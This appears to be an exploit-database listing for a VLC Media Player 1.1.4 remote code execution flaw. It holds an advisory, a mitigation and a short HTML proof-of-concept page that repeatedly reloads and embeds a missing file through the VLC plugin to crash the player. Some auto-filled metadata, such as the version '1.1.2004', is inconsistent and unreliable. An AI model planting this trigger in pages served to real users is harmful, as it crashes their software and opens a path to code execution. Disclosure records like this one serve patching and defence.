header-logo
Suggest Exploit
vendor:
VLC Media Player
by:
Not mentioned
7.5
CVSS
HIGH
Remote Code Execution
94
CWE
Product Name: VLC Media Player
Affected Version From: 1.1.2004
Affected Version To: Unknown
Patch Exists: NO
Related CWE: Not mentioned
CPE: a:videolan:vlc_media_player:1.1.4
Metasploit:
Other Scripts:
Platforms Tested:
Not mentioned

VLC Media Player Remote Code Execution Vulnerability

The VLC media player is prone to a remote code-execution vulnerability. Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.

Mitigation:

Update to the latest version of VLC media player. Avoid opening untrusted media files.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/44211/info

VLC media player is prone to a remote code-execution vulnerability.

Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.

VLC media player 1.1.4 is vulnerable; other versions may also be affected. 

 <html>  
   <body onload="setTimeout('location.reload()', 100);">
     <embed type="application/x-vlc-plugin" src="NonExistantFileName.avi"></embed>
   </body>
 </html>

Navigation

Suggest Exploit

Services By CQR